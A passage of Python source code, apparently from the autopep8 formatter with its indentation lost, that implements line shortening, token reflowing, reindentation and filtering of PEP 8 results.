indent_word = ' ' # Default in case source has no indentation
try:
for t in generate_tokens(source):
if t[0] == token.INDENT:
indent_word = t[1]
break
except (SyntaxError, tokenize.TokenError):
pass
return indent_word
def _get_indentation(line):
"""Return leading whitespace."""
if line.strip():
non_whitespace_index = len(line) - len(line.lstrip())
return line[:non_whitespace_index]
else:
return ''
def get_diff_text(old, new, filename):
"""Return text of unified diff between old and new."""
newline = '\n'
diff = difflib.unified_diff(
old, new,
'original/' + filename,
'fixed/' + filename,
lineterm=newline)
text = ''
for line in diff:
text += line
# Work around missing newline (http://bugs.python.org/issue2142).
if text and not line.endswith(newline):
text += newline + r'\ No newline at end of file' + newline
return text
def _priority_key(pep8_result):
"""Key for sorting PEP8 results.
Global fixes should be done first. This is important for things like
indentation.
"""
priority = [
# Fix multiline colon-based before semicolon based.
'e701',
# Break multiline statements early.
'e702',
# Things that make lines longer.
'e225', 'e231',
# Remove extraneous whitespace before breaking lines.
'e201',
# Shorten whitespace in comment before resorting to wrapping.
'e262'
]
middle_index = 10000
lowest_priority = [
# We need to shorten lines last since the logical fixer can get in a
# loop, which causes us to exit early.
'e501'
]
key = pep8_result['id'].lower()
try:
return priority.index(key)
except ValueError:
try:
return middle_index + lowest_priority.index(key) + 1
except ValueError:
return middle_index
def shorten_line(tokens, source, indentation, indent_word, max_line_length,
aggressive=False, experimental=False, previous_line=''):
"""Separate line at OPERATOR.
Multiple candidates will be yielded.
"""
for candidate in _shorten_line(tokens=tokens,
source=source,
indentation=indentation,
indent_word=indent_word,
aggressive=aggressive,
previous_line=previous_line):
yield candidate
if aggressive:
for key_token_strings in SHORTEN_OPERATOR_GROUPS:
shortened = _shorten_line_at_tokens(
tokens=tokens,
source=source,
indentation=indentation,
indent_word=indent_word,
key_token_strings=key_token_strings,
aggressive=aggressive)
if shortened is not None and shortened != source:
yield shortened
if experimental:
for shortened in _shorten_line_at_tokens_new(
tokens=tokens,
source=source,
indentation=indentation,
max_line_length=max_line_length):
yield shortened
def _shorten_line(tokens, source, indentation, indent_word,
aggressive=False, previous_line=''):
"""Separate line at OPERATOR.
The input is expected to be free of newlines except for inside multiline
strings and at the end.
Multiple candidates will be yielded.
"""
for (token_type,
token_string,
start_offset,
end_offset) in token_offsets(tokens):
if (
token_type == tokenize.COMMENT and
not is_probably_part_of_multiline(previous_line) and
not is_probably_part_of_multiline(source) and
not source[start_offset + 1:].strip().lower().startswith(
('noqa', 'pragma:', 'pylint:'))
):
# Move inline comments to previous line.
first = source[:start_offset]
second = source[start_offset:]
yield (indentation + second.strip() + '\n' +
indentation + first.strip() + '\n')
elif token_type == token.OP and token_string != '=':
# Don't break on '=' after keyword as this violates PEP 8.
assert token_type != token.INDENT
first = source[:end_offset]
second_indent = indentation
if first.rstrip().endswith('('):
second_indent += indent_word
elif '(' in first:
second_indent += ' ' * (1 + first.find('('))
else:
second_indent += indent_word
second = (second_indent + source[end_offset:].lstrip())
if (
not second.strip() or
second.lstrip().startswith('#')
):
continue
# Do not begin a line with a comma
if second.lstrip().startswith(','):
continue
# Do end a line with a dot
if first.rstrip().endswith('.'):
continue
if token_string in '+-*/':
fixed = first + ' \\' + '\n' + second
else:
fixed = first + '\n' + second
# Only fix if syntax is okay.
if check_syntax(normalize_multiline(fixed)
if aggressive else fixed):
yield indentation + fixed
# A convenient way to handle tokens.
Token = collections.namedtuple('Token', ['token_type', 'token_string',
'spos', 'epos', 'line'])
class ReformattedLines(object):
"""The reflowed lines of atoms.
Each part of the line is represented as an "atom." They can be moved
around when need be to get the optimal formatting.
"""
###########################################################################
# Private Classes
class _Indent(object):
"""Represent an indentation in the atom stream."""
def __init__(self, indent_amt):
self._indent_amt = indent_amt
def emit(self):
return ' ' * self._indent_amt
@property
def size(self):
return self._indent_amt
class _Space(object):
"""Represent a space in the atom stream."""
def emit(self):
return ' '
@property
def size(self):
return 1
class _LineBreak(object):
"""Represent a line break in the atom stream."""
def emit(self):
return '\n'
@property
def size(self):
return 0
def __init__(self, max_line_length):
self._max_line_length = max_line_length
self._lines = []
self._bracket_depth = 0
self._prev_item = None
self._prev_prev_item = None
def __repr__(self):
return self.emit()
###########################################################################
# Public Methods
def add(self, obj, indent_amt, break_after_open_bracket):
if isinstance(obj, Atom):
self._add_item(obj, indent_amt)
return
self._add_container(obj, indent_amt, break_after_open_bracket)
def add_comment(self, item):
num_spaces = 2
if len(self._lines) > 1:
if isinstance(self._lines[-1], self._Space):
num_spaces -= 1
if len(self._lines) > 2:
if isinstance(self._lines[-2], self._Space):
num_spaces -= 1
while num_spaces > 0:
self._lines.append(self._Space())
num_spaces -= 1
self._lines.append(item)
def add_indent(self, indent_amt):
self._lines.append(self._Indent(indent_amt))
def add_line_break(self, indent):
self._lines.append(self._LineBreak())
self.add_indent(len(indent))
def add_line_break_at(self, index, indent_amt):
self._lines.insert(index, self._LineBreak())
self._lines.insert(index + 1, self._Indent(indent_amt))
def add_space_if_needed(self, curr_text, equal=False):
if (
not self._lines or isinstance(
self._lines[-1], (self._LineBreak, self._Indent, self._Space))
):
return
prev_text = unicode(self._prev_item)
prev_prev_text = (
unicode(self._prev_prev_item) if self._prev_prev_item else '')
if (
# The previous item was a keyword or identifier and the current
# item isn't an operator that doesn't require a space.
((self._prev_item.is_keyword or self._prev_item.is_string or
self._prev_item.is_name or self._prev_item.is_number) and
(curr_text[0] not in '([{.,:}])' or
(curr_text[0] == '=' and equal))) or
# Don't place spaces around a '.', unless it's in an 'import'
# statement.
((prev_prev_text != 'from' and prev_text[-1] != '.' and
curr_text != 'import') and
# Don't place a space before a colon.
curr_text[0] != ':' and
# Don't split up ending brackets by spaces.
((prev_text[-1] in '}])' and curr_text[0] not in '.,}])') or
# Put a space after a colon or comma.
prev_text[-1] in ':,' or
# Put space around '=' if asked to.
(equal and prev_text == '=') or
# Put spaces around non-unary arithmetic operators.
((self._prev_prev_item and
(prev_text not in '+-' and
(self._prev_prev_item.is_name or
self._prev_prev_item.is_number or
self._prev_prev_item.is_string)) and
prev_text in ('+', '-', '%', '*', '/', '//', '**')))))
):
self._lines.append(self._Space())
def previous_item(self):
"""Return the previous non-whitespace item."""
return self._prev_item
def fits_on_current_line(self, item_extent):
return self.current_size() + item_extent <= self._max_line_length
def current_size(self):
"""The size of the current line minus the indentation."""
size = 0
for item in reversed(self._lines):
size += item.size
if isinstance(item, self._LineBreak):
break
return size
def line_empty(self):
return (self._lines and
isinstance(self._lines[-1],
(self._LineBreak, self._Indent)))
def emit(self):
string = ''
for item in self._lines:
if isinstance(item, self._LineBreak):
string = string.rstrip()
string += item.emit()
return string.rstrip() + '\n'
###########################################################################
# Private Methods
def _add_item(self, item, indent_amt):
"""Add an item to the line.
Reflow the line to get the best formatting after the item is
inserted. The bracket depth indicates if the item is being
inserted inside of a container or not.
"""
if self._prev_item and self._prev_item.is_string and item.is_string:
# Place consecutive string literals on separate lines.
self._lines.append(self._LineBreak())
self._lines.append(self._Indent(indent_amt))
item_text = unicode(item)
if self._lines and self._bracket_depth:
# Adding the item into a container.
self._prevent_default_initializer_splitting(item, indent_amt)
if item_text in '.,)]}':
self._split_after_delimiter(item, indent_amt)
elif self._lines and not self.line_empty():
# Adding the item outside of a container.
if self.fits_on_current_line(len(item_text)):
self._enforce_space(item)
else:
# Line break for the new item.
self._lines.append(self._LineBreak())
self._lines.append(self._Indent(indent_amt))
self._lines.append(item)
self._prev_item, self._prev_prev_item = item, self._prev_item
if item_text in '([{':
self._bracket_depth += 1
elif item_text in '}])':
self._bracket_depth -= 1
assert self._bracket_depth >= 0
def _add_container(self, container, indent_amt, break_after_open_bracket):
actual_indent = indent_amt + 1
if (
unicode(self._prev_item) != '=' and
not self.line_empty() and
not self.fits_on_current_line(
container.size + self._bracket_depth + 2)
):
if unicode(container)[0] == '(' and self._prev_item.is_name:
# Don't split before the opening bracket of a call.
break_after_open_bracket = True
actual_indent = indent_amt + 4
elif (
break_after_open_bracket or
unicode(self._prev_item) not in '([{'
):
# If the container doesn't fit on the current line and the
# current line isn't empty, place the container on the next
# line.
self._lines.append(self._LineBreak())
self._lines.append(self._Indent(indent_amt))
break_after_open_bracket = False
else:
actual_indent = self.current_size() + 1
break_after_open_bracket = False
if isinstance(container, (ListComprehension, IfExpression)):
actual_indent = indent_amt
# Increase the continued indentation only if recursing on a
# container.
container.reflow(self, ' ' * actual_indent,
break_after_open_bracket=break_after_open_bracket)
def _prevent_default_initializer_splitting(self, item, indent_amt):
"""Prevent splitting between a default initializer.
When there is a default initializer, it's best to keep it all on
the same line. It's nicer and more readable, even if it goes
over the maximum allowable line length. This goes back along the
current line to determine if we have a default initializer, and,
if so, to remove extraneous whitespaces and add a line
break/indent before it if needed.
"""
if unicode(item) == '=':
# This is the assignment in the initializer. Just remove spaces for
# now.
self._delete_whitespace()
return
if (not self._prev_item or not self._prev_prev_item or
unicode(self._prev_item) != '='):
return
self._delete_whitespace()
prev_prev_index = self._lines.index(self._prev_prev_item)
if (
isinstance(self._lines[prev_prev_index - 1], self._Indent) or
self.fits_on_current_line(item.size + 1)
):
# The default initializer is already the only item on this line.
# Don't insert a newline here.
return
# Replace the space with a newline/indent combo.
if isinstance(self._lines[prev_prev_index - 1], self._Space):
del self._lines[prev_prev_index - 1]
self.add_line_break_at(self._lines.index(self._prev_prev_item),
indent_amt)
def _split_after_delimiter(self, item, indent_amt):
"""Split the line only after a delimiter."""
self._delete_whitespace()
if self.fits_on_current_line(item.size):
return
last_space = None
for item in reversed(self._lines):
if (
last_space and
(not isinstance(item, Atom) or not item.is_colon)
):
break
else:
last_space = None
if isinstance(item, self._Space):
last_space = item
if isinstance(item, (self._LineBreak, self._Indent)):
return
if not last_space:
return
self.add_line_break_at(self._lines.index(last_space), indent_amt)
def _enforce_space(self, item):
"""Enforce a space in certain situations.
There are cases where we will want a space where normally we
wouldn't put one. This just enforces the addition of a space.
"""
if isinstance(self._lines[-1],
(self._Space, self._LineBreak, self._Indent)):
return
if not self._prev_item:
return
item_text = unicode(item)
prev_text = unicode(self._prev_item)
# Prefer a space around a '.' in an import statement, and between the
# 'import' and '('.
if (
(item_text == '.' and prev_text == 'from') or
(item_text == 'import' and prev_text == '.') or
(item_text == '(' and prev_text == 'import')
):
self._lines.append(self._Space())
def _delete_whitespace(self):
"""Delete all whitespace from the end of the line."""
while isinstance(self._lines[-1], (self._Space, self._LineBreak,
self._Indent)):
del self._lines[-1]
class Atom(object):
"""The smallest unbreakable unit that can be reflowed."""
def __init__(self, atom):
self._atom = atom
def __repr__(self):
return self._atom.token_string
def __len__(self):
return self.size
def reflow(
self, reflowed_lines, continued_indent, extent,
break_after_open_bracket=False,
is_list_comp_or_if_expr=False,
next_is_dot=False
):
if self._atom.token_type == tokenize.COMMENT:
reflowed_lines.add_comment(self)
return
total_size = extent if extent else self.size
if self._atom.token_string not in ',:([{}])':
# Some atoms will need an extra 1-sized space token after them.
total_size += 1
prev_item = reflowed_lines.previous_item()
if (
not is_list_comp_or_if_expr and
not reflowed_lines.fits_on_current_line(total_size) and
not (next_is_dot and
reflowed_lines.fits_on_current_line(self.size + 1)) and
not reflowed_lines.line_empty() and
not self.is_colon and
not (prev_item and prev_item.is_name and
unicode(self) == '(')
):
# Start a new line if there is already something on the line and
# adding this atom would make it go over the max line length.
reflowed_lines.add_line_break(continued_indent)
else:
reflowed_lines.add_space_if_needed(unicode(self))
reflowed_lines.add(self, len(continued_indent),
break_after_open_bracket)
def emit(self):
return self.__repr__()
@property
def is_keyword(self):
return keyword.iskeyword(self._atom.token_string)
@property
def is_string(self):
return self._atom.token_type == tokenize.STRING
@property
def is_name(self):
return self._atom.token_type == tokenize.NAME
@property
def is_number(self):
return self._atom.token_type == tokenize.NUMBER
@property
def is_comma(self):
return self._atom.token_string == ','
@property
def is_colon(self):
return self._atom.token_string == ':'
@property
def size(self):
return len(self._atom.token_string)
class Container(object):
"""Base class for all container types."""
def __init__(self, items):
self._items = items
def __repr__(self):
string = ''
last_was_keyword = False
for item in self._items:
if item.is_comma:
string += ', '
elif item.is_colon:
string += ': '
else:
item_string = unicode(item)
if (
string and
(last_was_keyword or
(not string.endswith(tuple('([{,.:}]) ')) and
not item_string.startswith(tuple('([{,.:}])'))))
):
string += ' '
string += item_string
last_was_keyword = item.is_keyword
return string
def __iter__(self):
for element in self._items:
yield element
def __getitem__(self, idx):
return self._items[idx]
def reflow(self, reflowed_lines, continued_indent,
break_after_open_bracket=False):
last_was_container = False
for (index, item) in enumerate(self._items):
next_item = get_item(self._items, index + 1)
if isinstance(item, Atom):
is_list_comp_or_if_expr = (
isinstance(self, (ListComprehension, IfExpression)))
item.reflow(reflowed_lines, continued_indent,
self._get_extent(index),
is_list_comp_or_if_expr=is_list_comp_or_if_expr,
next_is_dot=(next_item and
unicode(next_item) == '.'))
if last_was_container and item.is_comma:
reflowed_lines.add_line_break(continued_indent)
last_was_container = False
else: # isinstance(item, Container)
reflowed_lines.add(item, len(continued_indent),
break_after_open_bracket)
last_was_container = not isinstance(item, (ListComprehension,
IfExpression))
if (
break_after_open_bracket and index == 0 and
# Prefer to keep empty containers together instead of
# separating them.
unicode(item) == self.open_bracket and
(not next_item or unicode(next_item) != self.close_bracket) and
(len(self._items) != 3 or not isinstance(next_item, Atom))
):
reflowed_lines.add_line_break(continued_indent)
break_after_open_bracket = False
else:
next_next_item = get_item(self._items, index + 2)
if (
unicode(item) not in ['.', '%', 'in'] and
next_item and not isinstance(next_item, Container) and
unicode(next_item) != ':' and
next_next_item and (not isinstance(next_next_item, Atom) or
unicode(next_item) == 'not') and
not reflowed_lines.line_empty() and
not reflowed_lines.fits_on_current_line(
self._get_extent(index + 1) + 2)
):
reflowed_lines.add_line_break(continued_indent)
def _get_extent(self, index):
"""The extent of the full element.
E.g., the length of a function call or keyword.
"""
extent = 0
prev_item = get_item(self._items, index - 1)
seen_dot = prev_item and unicode(prev_item) == '.'
while index < len(self._items):
item = get_item(self._items, index)
index += 1
if isinstance(item, (ListComprehension, IfExpression)):
break
if isinstance(item, Container):
if prev_item and prev_item.is_name:
if seen_dot:
extent += 1
else:
extent += item.size
prev_item = item
continue
elif (unicode(item) not in ['.', '=', ':', 'not'] and
not item.is_name and not item.is_string):
break
if unicode(item) == '.':
seen_dot = True
extent += item.size
prev_item = item
return extent
@property
def is_string(self):
return False
@property
def size(self):
return len(self.__repr__())
@property
def is_keyword(self):
return False
@property
def is_name(self):
return False
@property
def is_comma(self):
return False
@property
def is_colon(self):
return False
@property
def open_bracket(self):
return None
@property
def close_bracket(self):
return None
class Tuple(Container):
"""A high-level representation of a tuple."""
@property
def open_bracket(self):
return '('
@property
def close_bracket(self):
return ')'
class List(Container):
"""A high-level representation of a list."""
@property
def open_bracket(self):
return '['
@property
def close_bracket(self):
return ']'
class DictOrSet(Container):
"""A high-level representation of a dictionary or set."""
@property
def open_bracket(self):
return '{'
@property
def close_bracket(self):
return '}'
class ListComprehension(Container):
"""A high-level representation of a list comprehension."""
@property
def size(self):
length = 0
for item in self._items:
if isinstance(item, IfExpression):
break
length += item.size
return length
class IfExpression(Container):
"""A high-level representation of an if-expression."""
def _parse_container(tokens, index, for_or_if=None):
"""Parse a high-level container, such as a list, tuple, etc."""
# Store the opening bracket.
items = [Atom(Token(*tokens[index]))]
index += 1
num_tokens = len(tokens)
while index < num_tokens:
tok = Token(*tokens[index])
if tok.token_string in ',)]}':
# First check if we're at the end of a list comprehension or
# if-expression. Don't add the ending token as part of the list
# comprehension or if-expression, because they aren't part of those
# constructs.
if for_or_if == 'for':
return (ListComprehension(items), index - 1)
elif for_or_if == 'if':
return (IfExpression(items), index - 1)
# We've reached the end of a container.
items.append(Atom(tok))
# If not, then we are at the end of a container.
if tok.token_string == ')':
# The end of a tuple.
return (Tuple(items), index)
elif tok.token_string == ']':
# The end of a list.
return (List(items), index)
elif tok.token_string == '}':
# The end of a dictionary or set.
return (DictOrSet(items), index)
elif tok.token_string in '([{':
# A sub-container is being defined.
(container, index) = _parse_container(tokens, index)
items.append(container)
elif tok.token_string == 'for':
(container, index) = _parse_container(tokens, index, 'for')
items.append(container)
elif tok.token_string == 'if':
(container, index) = _parse_container(tokens, index, 'if')
items.append(container)
else:
items.append(Atom(tok))
index += 1
return (None, None)
def _parse_tokens(tokens):
"""Parse the tokens.
This converts the tokens into a form where we can manipulate them
more easily.
"""
index = 0
parsed_tokens = []
num_tokens = len(tokens)
while index < num_tokens:
tok = Token(*tokens[index])
assert tok.token_type != token.INDENT
if tok.token_type == tokenize.NEWLINE:
# There's only one newline and it's at the end.
break
if tok.token_string in '([{':
(container, index) = _parse_container(tokens, index)
if not container:
return None
parsed_tokens.append(container)
else:
parsed_tokens.append(Atom(tok))
index += 1
return parsed_tokens
def _reflow_lines(parsed_tokens, indentation, max_line_length,
start_on_prefix_line):
"""Reflow the lines so that it looks nice."""
if unicode(parsed_tokens[0]) == 'def':
# A function definition gets indented a bit more.
continued_indent = indentation + ' ' * 2 * DEFAULT_INDENT_SIZE
else:
continued_indent = indentation + ' ' * DEFAULT_INDENT_SIZE
break_after_open_bracket = not start_on_prefix_line
lines = ReformattedLines(max_line_length)
lines.add_indent(len(indentation.lstrip('\r\n')))
if not start_on_prefix_line:
# If splitting after the opening bracket will cause the first element
# to be aligned weirdly, don't try it.
first_token = get_item(parsed_tokens, 0)
second_token = get_item(parsed_tokens, 1)
if (
first_token and second_token and
unicode(second_token)[0] == '(' and
len(indentation) + len(first_token) + 1 == len(continued_indent)
):
return None
for item in parsed_tokens:
lines.add_space_if_needed(unicode(item), equal=True)
save_continued_indent = continued_indent
if start_on_prefix_line and isinstance(item, Container):
start_on_prefix_line = False
continued_indent = ' ' * (lines.current_size() + 1)
item.reflow(lines, continued_indent, break_after_open_bracket)
continued_indent = save_continued_indent
return lines.emit()
def _shorten_line_at_tokens_new(tokens, source, indentation,
max_line_length):
"""Shorten the line taking its length into account.
The input is expected to be free of newlines except for inside
multiline strings and at the end.
"""
# Yield the original source so to see if it's a better choice than the
# shortened candidate lines we generate here.
yield indentation + source
parsed_tokens = _parse_tokens(tokens)
if parsed_tokens:
# Perform two reflows. The first one starts on the same line as the
# prefix. The second starts on the line after the prefix.
fixed = _reflow_lines(parsed_tokens, indentation, max_line_length,
start_on_prefix_line=True)
if fixed and check_syntax(normalize_multiline(fixed.lstrip())):
yield fixed
fixed = _reflow_lines(parsed_tokens, indentation, max_line_length,
start_on_prefix_line=False)
if fixed and check_syntax(normalize_multiline(fixed.lstrip())):
yield fixed
def _shorten_line_at_tokens(tokens, source, indentation, indent_word,
key_token_strings, aggressive):
"""Separate line by breaking at tokens in key_token_strings.
The input is expected to be free of newlines except for inside
multiline strings and at the end.
"""
offsets = []
for (index, _t) in enumerate(token_offsets(tokens)):
(token_type,
token_string,
start_offset,
end_offset) = _t
assert token_type != token.INDENT
if token_string in key_token_strings:
# Do not break in containers with zero or one items.
unwanted_next_token = {
'(': ')',
'[': ']',
'{': '}'}.get(token_string)
if unwanted_next_token:
if (
get_item(tokens,
index + 1,
default=[None, None])[1] == unwanted_next_token or
get_item(tokens,
index + 2,
default=[None, None])[1] == unwanted_next_token
):
continue
if (
index > 2 and token_string == '(' and
tokens[index - 1][1] in ',(%['
):
# Don't split after a tuple start, or before a tuple start if
# the tuple is in a list.
continue
if end_offset < len(source) - 1:
# Don't split right before newline.
offsets.append(end_offset)
else:
# Break at adjacent strings. These were probably meant to be on
# separate lines in the first place.
previous_token = get_item(tokens, index - 1)
if (
token_type == tokenize.STRING and
previous_token and previous_token[0] == tokenize.STRING
):
offsets.append(start_offset)
current_indent = None
fixed = None
for line in split_at_offsets(source, offsets):
if fixed:
fixed += '\n' + current_indent + line
for symbol in '([{':
if line.endswith(symbol):
current_indent += indent_word
else:
# First line.
fixed = line
assert not current_indent
current_indent = indent_word
assert fixed is not None
if check_syntax(normalize_multiline(fixed)
if aggressive > 1 else fixed):
return indentation + fixed
else:
return None
def token_offsets(tokens):
"""Yield tokens and offsets."""
end_offset = 0
previous_end_row = 0
previous_end_column = 0
for t in tokens:
token_type = t[0]
token_string = t[1]
(start_row, start_column) = t[2]
(end_row, end_column) = t[3]
# Account for the whitespace between tokens.
end_offset += start_column
if previous_end_row == start_row:
end_offset -= previous_end_column
# Record the start offset of the token.
start_offset = end_offset
# Account for the length of the token itself.
end_offset += len(token_string)
yield (token_type,
token_string,
start_offset,
end_offset)
previous_end_row = end_row
previous_end_column = end_column
def normalize_multiline(line):
"""Normalize multiline-related code that will cause syntax error.
This is for purposes of checking syntax.
"""
if line.startswith('def ') and line.rstrip().endswith(':'):
return line + ' pass'
elif line.startswith('return '):
return 'def _(): ' + line
elif line.startswith('@'):
return line + 'def _(): pass'
elif line.startswith('class '):
return line + ' pass'
elif line.startswith('if '):
return line + ' pass'
else:
return line
def fix_whitespace(line, offset, replacement):
"""Replace whitespace at offset and return fixed line."""
# Replace escaped newlines too
left = line[:offset].rstrip('\n\r \t\\')
right = line[offset:].lstrip('\n\r \t\\')
if right.startswith('#'):
return line
else:
return left + replacement + right
def _execute_pep8(pep8_options, source):
"""Execute pep8 via python method calls."""
class QuietReport(pep8.BaseReport):
"""Version of checker that does not print."""
def __init__(self, options):
super(QuietReport, self).__init__(options)
self.__full_error_results = []
def error(self, line_number, offset, text, _):
"""Collect errors."""
code = super(QuietReport, self).error(line_number, offset, text, _)
if code:
self.__full_error_results.append(
{'id': code,
'line': line_number,
'column': offset + 1,
'info': text})
def full_error_results(self):
"""Return error results in detail.
Results are in the form of a list of dictionaries. Each
dictionary contains 'id', 'line', 'column', and 'info'.
"""
return self.__full_error_results
checker = pep8.Checker('', lines=source,
reporter=QuietReport, **pep8_options)
checker.check_all()
return checker.report.full_error_results()
def _remove_leading_and_normalize(line):
return line.lstrip().rstrip(CR + LF) + '\n'
class Reindenter(object):
"""Reindents badly-indented code to uniformly use four-space indentation.
Released to the public domain, by Tim Peters, 03 October 2000.
"""
def __init__(self, input_text):
sio = io.StringIO(input_text)
source_lines = sio.readlines()
self.string_content_line_numbers = multiline_string_lines(input_text)
# File lines, rstripped & tab-expanded. Dummy at start is so
# that we can use tokenize's 1-based line numbering easily.
# Note that a line is all-blank iff it is a newline.
self.lines = []
line_number = 0
for line in source_lines:
line_number += 1
# Do not modify if inside a multiline string.
if line_number in self.string_content_line_numbers:
self.lines.append(line)
else:
# Only expand leading tabs.
self.lines.append(_get_indentation(line).expandtabs() +
_remove_leading_and_normalize(line))
self.lines.insert(0, None)
self.index = 1 # index into self.lines of next line
self.input_text = input_text
def run(self, indent_size=DEFAULT_INDENT_SIZE):
"""Fix indentation and return modified line numbers.
Line numbers are indexed at 1.
"""
if indent_size < 1:
return self.input_text
try:
stats = _reindent_stats(tokenize.generate_tokens(self.getline))
except (SyntaxError, tokenize.TokenError):
return self.input_text
# Remove trailing empty lines.
lines = self.lines
while lines and lines[-1] == '\n':
lines.pop()
# Sentinel.
stats.append((len(lines), 0))
# Map count of leading spaces to # we want.
have2want = {}
# Program after transformation.
after = []
# Copy over initial empty lines -- there's nothing to do until
# we see a line with *something* on it.
i = stats[0][0]
after.extend(lines[1:i])
for i in range(len(stats) - 1):
thisstmt, thislevel = stats[i]
nextstmt = stats[i + 1][0]
have = _leading_space_count(lines[thisstmt])
want = thislevel * indent_size
if want < 0:
# A comment line.
if have:
# An indented comment line. If we saw the same
# indentation before, reuse what it most recently
# mapped to.
want = have2want.get(have, -1)
if want < 0:
# Then it probably belongs to the next real stmt.
for j in range(i + 1, len(stats) - 1):
jline, jlevel = stats[j]
if jlevel >= 0:
if have == _leading_space_count(lines[jline]):
want = jlevel * indent_size
break
if want < 0: # Maybe it's a hanging
# comment like this one,
# in which case we should shift it like its base
# line got shifted.
for j in range(i - 1, -1, -1):
jline, jlevel = stats[j]
if jlevel >= 0:
want = (have + _leading_space_count(
after[jline - 1]) -
_leading_space_count(lines[jline]))
break
if want < 0:
# Still no luck -- leave it alone.
want = have
else:
want = 0
assert want >= 0
have2want[have] = want
diff = want - have
if diff == 0 or have == 0:
after.extend(lines[thisstmt:nextstmt])
else:
line_number = thisstmt - 1
for line in lines[thisstmt:nextstmt]:
line_number += 1
if line_number in self.string_content_line_numbers:
after.append(line)
elif diff > 0:
if line == '\n':
after.append(line)
else:
after.append(' ' * diff + line)
else:
remove = min(_leading_space_count(line), -diff)
after.append(line[remove:])
return ''.join(after)
def getline(self):
"""Line-getter for tokenize."""
if self.index >= len(self.lines):
line = ''
else:
line = self.lines[self.index]
self.index += 1
return line
def _reindent_stats(tokens):
"""Return list of (lineno, indentlevel) pairs.
One for each stmt and comment line. indentlevel is -1 for comment lines, as
a signal that tokenize doesn't know what to do about them; indeed, they're
our headache!
"""
find_stmt = 1 # Next token begins a fresh stmt?
level = 0 # Current indent level.
stats = []
for t in tokens:
token_type = t[0]
sline = t[2][0]
line = t[4]
if token_type == tokenize.NEWLINE:
# A program statement, or ENDMARKER, will eventually follow,
# after some (possibly empty) run of tokens of the form
# (NL | COMMENT)* (INDENT | DEDENT+)?
find_stmt = 1
elif token_type == tokenize.INDENT:
find_stmt = 1
level += 1
elif token_type == tokenize.DEDENT:
find_stmt = 1
level -= 1
elif token_type == tokenize.COMMENT:
if find_stmt:
stats.append((sline, -1))
# But we're still looking for a new stmt, so leave
# find_stmt alone.
elif token_type == tokenize.NL:
pass
elif find_stmt:
# This is the first "real token" following a NEWLINE, so it
# must be the first token of the next program statement, or an
# ENDMARKER.
find_stmt = 0
if line: # Not endmarker.
stats.append((sline, level))
return stats
def _leading_space_count(line):
"""Return number of leading spaces in line."""
i = 0
while i < len(line) and line[i] == ' ':
i += 1
return i
def refactor_with_2to3(source_text, fixer_names):
"""Use lib2to3 to refactor the source.
Return the refactored source code.
"""
check_lib2to3()
from lib2to3.refactor import RefactoringTool
fixers = ['lib2to3.fixes.fix_' + name for name in fixer_names]
tool = RefactoringTool(fixer_names=fixers, explicit=fixers)
from lib2to3.pgen2 import tokenize as lib2to3_tokenize
try:
return unicode(tool.refactor_string(source_text, name=''))
except lib2to3_tokenize.TokenError:
return source_text
def check_syntax(code):
"""Return True if syntax is okay."""
try:
return compile(code, '<string>', 'exec')
except (SyntaxError, TypeError, UnicodeDecodeError):
return False
def filter_results(source, results, aggressive):
"""Filter out spurious reports from pep8.
If aggressive is True, we allow possibly unsafe fixes (E711, E712).
"""
non_docstring_string_line_numbers = multiline_string_lines(
source, include_docstrings=False)
all_string_line_numbers = multiline_string_lines(
source, include_docstrings=True)
commented_out_code_line_numbers = commented_out_code_lines(source)
for r in results:
issue_id = r['id'].lower()
if r['line'] in non_docstring_string_line_numbers:
if issue_id.startswith(('e1', 'e501', 'w191')):
continue
if r['line'] in all_string_line_numbers:
if issue_id in ['e501']:
continue
# We must offset by 1 for lines that contain the trailing contents of
# multiline strings.
if not aggressive and (r['line'] + 1) in all_string_line_numbers:
# Do not modify multiline strings in non-aggressive mode. Remove
# trailing whitespace could break doctests.
if issue_id.startswith(('w29', 'w39')):
continue
if aggressive <= 0:
if issue_id.startswith(('e711', 'w6')):
continue
if aggressive <= 1:
if issue_id.startswith(('e712', 'e713')):
continue
if r['line'] in commented_out_code_line_numbers:
if issue_id.startswith(('e26', 'e501')):
continue
yield r
def multiline_string_lines(source, include_docstrings=False):
"""Return line numbers that are within multiline strings.
The line numbers are indexed at 1.
Docstrings are ignored.
"""
line_numbers = set()
previous_token_type = ''
try:
for t in generate_tokens(source):
token_type = t[0]
start_row = t[2][0]
end_row = t[3][0]
if token_type == tokenize.STRING and start_row != end_row:
if (
include_docstrings or
previous_token_type != tokenize.INDENT
):
# We increment by one since we want the contents of the
# string.
line_numbers |= set(range(1 + start_row, 1 + end_row))
previous_token_type = token_type
except (SyntaxError, tokenize.TokenError):
pass
return line_numbers
def commented_out_code_lines(source):
"""Return line numbers of comments that are likely code.
Commented-out code is bad practice, but modifying it just adds even more
clutter.
"""
line_numbers = []
try:
for t in generate_tokens(source):
token_type = t[0]
token_string = t[1]
start_row = t[2][0]
line = t[4]
# Ignore inline comments.
if not line.lstrip().startswith('#'):
continue
if token_type == tokenize.COMMENT:
stripped_line = token_string.lstrip('#').strip()
if (
' ' in stripped_line and
'#' not in stripped_line and
check_syntax(stripped_line)
):
line_numbers.append(start_row)
except (SyntaxError, tokenize.TokenError):
pass
return line_numbers
def shorten_comment(line, max_line_length, last_comment=False):
"""Return trimmed or split long comment line.
If there are no comments immediately following it, do a text wrap.
Doing this wrapping on all comments in general would lead to jagged
comment text.
"""
assert len(line) > max_line_length
line = line.rstrip()
# PEP 8 recommends 72 characters for comment text.
indentation = _get_indentation(line) + '# '
max_line_length = min(max_line_length,
len(indentation) + 72)
MIN_CHARACTER_REPEAT = 5
if (
len(line) - len(line.rstrip(line[-1])) >= MIN_CHARACTER_REPEAT and
not line[-1].isalnum()
):
# Trim comments that end with things like ---------
return line[:max_line_length] + '\n'
elif last_comment and re.match(r'\s*#+\s*\w+', line):
import textwrap
split_lines = textwrap.wrap(line.lstrip(' \t#'),
initial_indent=indentation,
subsequent_indent=indentation,
width=max_line_length,
break_long_words=False,
break_on_hyphens=False)
return '\n'.join(split_lines) + '\n'
else:
return line + '\n'
def normalize_line_endings(lines, newline):
"""Return fixed line endings.
All lines will be modified to use the most common line ending.
"""
return [line.rstrip('\n\r') + newline for line in lines]
def mutual_startswith(a, b):
return b.startswith(a) or a.startswith(b)
def code_match(code, select, ignore):
if ignore:
assert not isinstance(ignore, unicode)
for ignored_code in [c.strip() for c in ignore]:
if mutual_startswith(code.lower(), ignored_code.lower()):
return False
if select:
assert not isinstance(select, unicode)
for selected_code in [c.strip() for c in select]:
if mutual_startswith(code.lower(), selected_code.lower()):
return True
return False
return True
def fix_code(source, options=None, encoding=None):
"""Return fixed source code."""
